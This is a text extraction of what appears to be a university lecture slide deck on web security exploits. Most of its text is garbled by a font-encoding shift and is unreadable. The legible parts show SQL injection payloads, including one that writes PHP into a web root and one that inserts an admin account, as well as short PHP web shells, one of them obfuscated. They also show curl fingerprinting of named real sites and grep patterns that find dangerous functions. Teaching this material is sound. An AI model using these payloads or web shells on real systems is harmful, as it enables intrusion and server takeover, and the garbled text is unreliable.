Web Security - Exploits

$PNQVUFS4FDVSJUZBU/5645 *OOEZJOOEZUX!HNBJMDPN 8FC4FDVSJUZ&YQMPJUT

0VUMJOF ˙ #VHBOE7VMOFSBCJMJUZ ˙ $PNNPO5ZQFPG7VMOFSBCJMJUZJO8FC ˙ 7VMOFSBCJMJUZ)VOUJOH ˙ $PNNPO7VMOFSBCJMJUJFT ˙
944 ˙ 42-*OKFDUJPO

#VH 7VMOFSBCJMJUZ

#VH :PVSBQQMJDBUJPODSBTIFE

7VMOFSBCJMJUZ *UTBOFYQMPJUBCMFCVH

8FC4FDVSJUZ

:,5b pR7 A½ R7 DNS R7 Webc' R7 WebâÂ R7
*½ R7 Webèd ¬R7 £Û R7 @fv¡ R7 XSS XXE SQL Injection CSRF 齡❉8FC)BDLJOH⚥涸㣼䪮帱䊫CZ0SBOHFIUUQTHPPHMW40D2I

4ZTUFN4FDVSJUZ

:,5b pR7 A½ R7 DNS R7 Webc' R7 WebâÂ R7
*½ R7 Webèd ¬R7 £Û R7 @fv¡ R7 Struts2 OGNL RCE Rails YAML RCE XSS UXSS Padding Oracle Padding Oracle XXE DNS Hijacking SQL Injection ShellShock FastCGI RCE NPRE RCE CSRF Bit-Flipping Attack 齡❉8FC)BDLJOH⚥涸㣼䪮帱䊫CZ0SBOHFIUUQTHPPHMW40D2I

$PNNPO5ZQFPG7VMOFSBCJMJUZJO8FC"QQ ˙ -PHJD&SSPS ˙ 3BDF$POEJUJPO ".JTTJOH'VODUJPO-FWFM"DDFTT$POUSPM ˙ *OKFDUJPO ˙ 42-*OKFDUJPO
944 99&*OKFDUJPO $NE*OKFDUJPO ˙ .FNPSZ$PSSVQUJPO ˙ VOTFSJBMJ[F JO1)1 DBTFTUVEZ ˙ %FOJFEP4FSWJDF ˙ 3FHFY%P4 -PHJD#VHMFBETUP*OOJUZ-PPQ

7VMOFSBCJMJUZ)VOUJOH ˙ 8IJUFCPY5FTU ˙ $PEF3FWJFX ˙ #MBDLCPY5FTU ˙ (VFTTBOEUSZUPJOKFDUTPNFUIJOHUPZPVSJOQVUFMET ˙
(SBZCPY5FTU ˙ 8IJUFCPY #MBDLCPYUFTUXIFOZPVIBWFQBSUJBMPGTPVSDFDPEFPS PUIFSWFSTJPOPGTPVSDFDPEF

8IJUFCPY5FTU ˙ )PX ˙ 3FBEUIFG LJOHDPEF ˙ 3FBEUIFG LJOHDPEF
˙ 3FBEUIFG LJOHDPEF ˙ BOETPPO

8IJUFCPY5FTU&TTFOUJBM4LJMMT5PPMT ˙ $BOZPVSFBEUIJTMBOHVBHF "SFZPVDPNQMFUFMZLOPXUIJTMBOHVBHF ˙ *GOPU MFBSOJUBOENBTUFSJU ˙ $PNNBOEMJOFUPPMTPSZPVSGBWPSJUFNPEFSOUFYUFEJUPS
˙ 4PNFTVQFSDPPMVUJMTMJLF ˙ HSFQ BXL TFE OE ˙ .PEFSOUFYFEJUPSCVUOPUOPUFQBEXJUIPVU ˙ 4VCMJNF5FYU 7JTVBM4UVEJP$PEF /PUFQBE

8IJUFCPY5FTU-BOHVBHFGFBUVSF ˙ 8IBUTXSPOHXJUIUIFTFDPEF • /* PHP */  if(!strcmp($_POST['password'], "the
secret password"))  {  echo "You are in!\n";  } • # shell script  cd "/home/$USER/data" && zip backup.zip *

8IJUFCPY5FTU-BOHVBHFGFBUVSF

8IJUFCPY5FTU-BOHVBHFGFBUVSF )*5$0/$5'PWFSUIFSF

8IJUFCPY5FTU ˙ 6TFSFHVMBSFYQSFTTJPOUPMPDBUFTPNFUIJOHMPPLTEBOHFSPVT • egrep '(system|fwrite|danger_func)$.*\$\w+.*$' -r . • ack-grepJTBHPPEUPPM
• ack --php '(new )?mysqli?_connect'

3FHVMBS&YQSFTTJPO ^ABC -JOFTUBSUTXJUI"#$ DEF$ -JOFFOETXJUI%&' A+ 0OF"UPJOOJUZ" A* ;FSPUPJOOJUZ" A?
;FSPPSPOF" (ABC|DEF)? "#$PS%&'PSOPUIJOH \w "MQIBCFU %JHJUT 6OEFSMJOF . "OZDIBSBDUFS [i-k3-5OAQ] 0OFPGJ K L 0 " 2

3FHVMBS&YQSFTTJPO (system|fwrite|danger_func)$.*\$\w+.*$ POFPGTZTUFN GXSJUF EBOHFS@GVOD DIBSBDUFS BOZTUSJOH BOZMFOHUI DIBSBDUFS
DIBSBDUFS <";B[@>

8IJUFCPY5FTU 1)1 ˙ ,FFQBOFZFPOUIFDPEFXJUIUIFTFGVODUJPOT ˙ FYFDVUFTIFMMDPNNBOETZTUFN FYFD QBTTUISPV CBDLRVPUF ˙
TRMRVFSZNZTRM@RVFSZ NZTRMJRVFSZ 1%0FYFDVUF ˙ MFVQMPBENPWF@VQMPBEFE@MF @'*-&4 ˙ MFJODMVTJPOSFRVJSF SFRVJSF@PODF JODMVEF JODMVEF@PODF ˙ MFPQFSBUJPOGPQFO VOMJOL MF DPQZ SFOBNF ˙ TFTTJPONBOBHFNFOU@$00,*& @4&44*0/ TFTTJPO@TUBSU

8IJUFCPY5FTU "41/&5/&5.7$ ˙ ,FFQBOFZFPOUIFDPEFXJUIUIFTFGVODUJPOT ˙ FYFDVUFTIFMMDPNNBOE1SPDFTT4UBSU $SFBUF1SPDFTT ˙ TRMRVFSZ$PNNBOE5FYU
˙ MFVQMPBE3FRVFTU'JMFT 1PTUFE'JMF ˙ MFPQFSBUJPO'JMF= 'JMF4ZTUFN= ˙ TFTTJPONBOBHFNFOU4FTTJPO

#MBDLCPY5FTU ˙ 5SZUPJOKFDUJPOTPNFUIJOHUPBOZQPTTJCMFJOQVUFME ˙ )551IFBEFS ˙ 9'PSXBSEFE'PS ˙ 6TFS"HFOU ˙
1045CPEZ ˙ (&5QBSBNFUFS ˙ DPPLJF

#MBDLCPY5FTU ˙ 8IBUUPJOKFDU ˙ RTFDVSJUZ CVH ˙ R<>TFDVJSUZ CVH
˙ RPS ˙ R MTBM ˙ RTDSJQUBMFSU TDSJQU

*NBHJOBUJPOBOE$SFBUJWFJTZPVSQPXFS

8IBUCPY74#MBDLCPY ˙ #MBDLCPYNFUIPEDBORVJDLMZEFUFDUTPNFWVMOFSBCJMJUZ ˙ 42-*OKFDUJPO $NE*OKFDUJPO 8IBUFWFS*OKFDUJPO 944 FUD ˙
.PTUPG08"415PQDBOCFEFUFDUFE ˙ #VUOPUHPPEBUMPHJDCVH DSZQUPGBJMT ˙ 8IJUFCPYNFUIPEDBOOEBMMCVHBOEWVMOFSBCJMJUZ ˙ *OOJUZUJNF JOOJUZCVH ˙ *UTWFSZIBSEUPEJHWVMOFSBCJMJUZJODPNQMFYBOEIVHFTZTUFN

(SBZCPY5FTUJOH ˙ 8FSFBEDPEFBOEUSZUPJOKFDUJPOTPNFUIJOH ˙ 4PNFUJNFTXFEPOUIBWFGVMMTPVSDFDPEFPS POMZPMEFSWFSTJPOJTBWBJMBCMFMFBLFE ˙ 08"415PQJTFBTZUPEFUFDU OEJUSTU

$PMMFDU*OGPSNBUJPO

$PMMFDUJPO*OGPSNBUJPO ˙ 8IBUBSFXFJOUFSFTUFE ˙ 8IBUUFDIOPMPHZTUBDLBSFPVSUBSHFUVTFE ˙ 6OEPDVNFOUFEVOMJTUFE63-"1* ˙
'VMMQBUIEJTDMPTVSF ˙ 7FSTJPODPOUSPMTZTUFNNBZDBVTFUPTPVSDFDPEFMFBLBHF ˙ 44-$FSUJDBUF

'JOHFSQSJOUJOH

'JOHFSQSJOUJOH ˙ 'JHVSFPVUUFDIOPMPHZTUBDLBSFZPVSUBSHFUVTJOH ˙ -BOHVBHF ˙ 'SBNFXPSL ˙ 7FSTJPO ˙
04 ˙ )5514FSWFS

'JOHFSQSJOUJOH)5513FTQPOTF $ curl -I http://eyny.com/ HTTP/1.1 302 Found X-Powered-By: PHP/5.2.17
Location: http://www67.eyny.com/index.php Content-type: text/html Date: Wed, 12 Oct 2016 16:32:22 GMT Server: Apache/2.0.59 1SFUUZPME1)1WFSTJPO "CPVUZFBSTPME

'JOHFSQSJOUJOH)5513FTQPOTF $ curl -I -k https://stu255.ntust.edu.tw/ntust_stu/stu.aspx HTTP/1.1 200 OK Date:
Thu, 13 Oct 2016 03:10:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 93 8JOEPXT4FSWFS /&5'SBNFXPSL

'JOHFSQSJOUJOH1)1 ˙ IUUQXXXQTDOUVFEVUX 1)1&'%E """"$' • X-Powered-By: PHP/.*

'JOHFSQSJOUJOH3BJMT

1BUI%JTDMPTVSF ˙ IUUQXIBUFWFSDPNSPCPUTUYU ˙ 5FMMTFBSDIFOHJOFUPOPUUPTFBSDITPNFQBUI ˙ 4PNFUJNFTJUSFWFBMTXIFSFJTBENJOQBOFMPSDPOHMF

&SSPS.FTTBHF'VMM1BUI%JTDMPTVSF ˙ 4PNFXFCTJUFTIPXTJUTFSSPSNFTTBHFUPVTFS ˙ *UNBZMFBLTPNFDPEFBOEMFQBUI PSFWFOXPSTF ˙ (PPHMFIBDLJOH1%0@@DPOTUSVDU NZTRM ˙
$POWFSUBOPSNBM(&5QBSBNFUFSUPBSSBZCZJOKFDU<>

&SSPS.FTTBHF'VMM1BUI%JTDMPTVSF

44-$FSUJDBUF)PXEPFTJUXPSLT ˙ "TZNNFUSJD$SZQUPHSBQIZ1VCLFZ 1SJWLFZ ˙ &ODSZQUXJUI1VCLFZ EFDSZQUXJUI1SJWLFZ ˙ &ODSZQUXJUI1SJWLFZ EFDSZQUXJUI1VCLFZ
˙ 8FDBMMUIJTTJHOJOH ˙ &WFSZDFSUJDBUFIBTBBTZNNFUSJDDSZQUPLFZ ˙ :PVDBOVTFBDFSUUPTJHOBOPUIFSDFSU ˙ :PVSDPNQVUFSIBTTPNFCVJMUJOSPPUDFSU8FDBMMJU$" ˙ :PVUSVTUPOF$" UIFOZPVUSVTUUIFDFSUTTJHOFECZJU

44-$FSUJDBUF*OBDFSUJDBUF ˙ 5IFNPTUJNQPSUBOUFMEJTDBMMFEDPNNPOOBNF $/ ˙ YWGPSNBUTVQQPSU4VCKFDU"MUFSOBUJWF/BNFGFBUVSFUIBUBMMPX ZPVQVUEJFSFOUEPNBJOJOPOFDFSU

44-$FSUJDBUF

7FSTJPO$POUSPM4ZTUFN ˙ 4PNFUJNFT ZPVPQFO'JMF;JMMBBOEESBHFOUJSFGPMEFSUPTFSWFS ˙ TWO ˙ HJU ˙ 8IBUDPOUBJOTJOBHJUSFQPTJUPSZ
˙ "UPPMUPEPXOMPBEHJUGSPN)551TFSWFS ˙ IUUQTHJUIVCDPNEFOOZTDSBCCMF

$PNNPO7VMOFSBCJMJUJFT

944 ˙ )5.-*OKFDUJPO +BWB4DSJQU*OKFDUJPO ˙ $MPTFDVSSFOUBUUSJCVUFUBHBOEJOKFDUTPNFTDSJQU ˙ JNHTSDIUUQJNHVSDPN\*%^QOH ˙ QDMBTTNTH\.&44"(&^Q
˙ 5XP5ZQFT ˙ 3FFDUFE944944QBZMPBEGSPNUIFJOQVUFMET ˙ 4UPSFE944944QBZMPBETUPSFEPOUIFTFSWFS

944 ˙ )PXUPEFGFOTF ˙ 3FNPWFBMMIUNMUBHTGSPNVTFSJOQVU ˙ )5.-FOUJUZFODPEF

9443FBMDBTFMJNJUFEMFOHUI944 ˙ 3FBMDBTFJO"*4 4DPSFCPBSEGSPN,PSFBO#P#QSPKFDUMFDUVSFS ˙ IUUQTWVMTFDVSJUZOUVTUMJNJUFEYTT

42-*OKFDUJPO ˙ $PODBUJOQVUFMETBOE42-TUBUFNFOUXJUIPVUQSPQFSTBOJUJ[F

42-*OKFDUJPO&YQMPJUT • SELECT * FROM users WHERE  name = '{$USR}'
AND password = '{$PWD}' • payload => ' or 2 <3# • result => SELECT * FROM users WHERE  name = '' or 2 <3 #' AND password = 'asjdf'

AND password = '{$PWD}' • payload => ' UNION SELECT 1, 2, 3# • result => SELECT * FROM users WHERE  name = '' UNION SELECT 1,2,3  #' AND password = 'asjdf' 6/*0/4&-&$5

AND password = '{$PWD}' • payload => ' UNION SELECT 1,2,'<?php //bad' INTO   OUTFILE '/var/www/index.php'# • result => SELECT * FROM users WHERE  name = '' UNION SELECT 1,2,'<php //bad' INTO  OUTFILE '/var/www/index.php'  #' AND password = 'asjdf' */50065'*-&

AND password = '{$PWD}' • payload => ' OR ASCII(SUBSTR(name, 1, 1)) > 64 # • result => SELECT * FROM users WHERE  name = '' OR ASCII(SUBSTR(name, 1, 1)) > 64  #' AND password = 'asjdf' #MJOE*OKFDUJPO

42-*OKFDUJPO&YQMPJUT • INSERT INTO users (id, name, password, is_admin)  VALUES
(NULL, '{$USR}', '{$PWD}', 0); • payload => inndy', 'pass', 1) # • result => INSERT INTO users  (id, name, password, is_admin)  VALUES (NULL, 'inndy', 'pass', 1) #', 'xxx', 0); *OTFSU

42-*OKFDUJPO&YQMPJUT %FNPTRMNBQBEWBODFEVTBHF

42-*OKFDUJPO&YQMPJUT ˙ 5IJOLPOFNJMMJPOUJNFTCFGPSFFYQMPJUBXJME42-JWVM ˙ 5IJOLBCPVUJU JG42-TUBUFNFOUMPPLTMJLFCFMPX • DELETE FROM article
WHERE id = '{$ID}'; • UPDATE SET nickname = '{$NICK}' WHERE id = '{$ID}';

42-*OKFDUJPO&YQMPJUT 8FMM *UTB61%"5&%&-&5&TUBUFNFOU

42-*OKFDUJPO5SVF5SBHJD4UPSZ 4PNFEBZGCDPNHSPVQT/56IFBE

42-*OKFDUJPO5SVF5SBHJD4UPSZ

42-*OKFDUJPO&YQMPJUT ˙ :FUBOPUIFSUSVFTUPSZ ˙ "CPVU.BQMF4UPSZQSJWBUFTFSWFS

0UIFS7VMOFSBCJMJUZ.JTD

#BE&ODPEJOH

65'5IFCBEDIBS

#BE&ODPEJOH ˙ 8IFOZPVUSZEFDPEFTPNFCZUFTEBUBUPVOJDPEF JOWBMJE CZUFTTFRVFODFXJMMCFDPOWFSUUPVOJDPEF=VGE ˙ =Y&'=Y#'=Y#%JO65' ˙ *UNBZDBVTFTPNFUSPVCMF

0QFO$5'ˋ.JTDSBOEEVNC ˙ IUUQTHJTUHJUIVCDPN*OOEZBDCGEEGCFGDDGF • /* TL; DR */  var x
= genearte_random_bytes(); // Buffer  x = String.fromCharCode(x.length) + x; // String + Buffer = String  var token = Base64.encode(x);

85'1)1

85'1)1&RVBMJUZ ˙ NE 2/,$%;0 NE

85'1)1VOTFSJBMJ[F ˙ $MBTT@@XBLFVQ ˙ $MBTT@@EFTUSVDU ˙ VOTFSJBMJ[FTVDLTVTFBGUFSGSFFJOVOTFSJBMJ[F ˙ /FWFS &WFSVOTFSJBMJ[FTPNFUIJOHGSPNVOUSVTUFETPVSDF
˙ 6TF+40/

85'1)1FYUSBDU ˙ %FGBVMUCFIBWJPSJTPWFSXSJUFBMMFYJTUFEWBSJBCMFT ˙ FYUSBDU TUNURVFSZ GFUDI$PMVNO JUTWFSZDPNNPO

85'1)1QBTTXPSE@IBTI ˙ QBTTXPSE@IBTI QBTTX=SE 1"44803%@%&'"6-5 ˙ OVMMCZUFUSVODBUJPOXIJMFIBTIJOHQBTTXPSE

85'1)1BSHVNFOUUZQF ˙ JG TUSDNQ @(&5<QBTTXPSE> QBTTXPSE FDIP1BTT

4FSWFS4JEF5FNQMBUF*OKFDUJPO

445* ˙ *UT UIFBHFPG.7$ ˙ #VHCPVOUZ+JOKB445*JO6CFSSFQPSUFECZ0SBOHF ˙ 5SFOEZJO$5'T ˙ 44$5''MBH.BO
˙ 4&$6*/4*%&4##4 ˙ )*5$0/$5'4FDVSF1PTU ˙ 4BOECPYNFDIBOJTNJONBOZUFNQMBUFFOHJOF ˙ 4JNQMF5SJDL<>@@DMBTT@@@@NSP@@<>@@TVCDMBTTFT@@

445* ˙ &YQMPJUVOQJDLMFVOTFSJBMJ[F JO1ZUIPO ˙ &YQMPJUMF UIFODPOHGSPN@QZMF

)PXUPXSJUFB1)1XFCTIFMM ˙ 5SJWJBM • <?php system($_GET['cmd']); ?> ˙ "MJUUMFDPOGVTF •
<?php $_REQUEST[a]($_REQUEST[b]); ?> ˙ )FSFJTNZGBWPSJUF TIBSFXJUIZPV • <?php $a55="\x61ss"."ert";$a55($_REQUEST["a"]); ?>

Web Security - Exploits

Web Security - Exploits

More Decks by Inndy

Other Decks in Technology

Featured

Transcript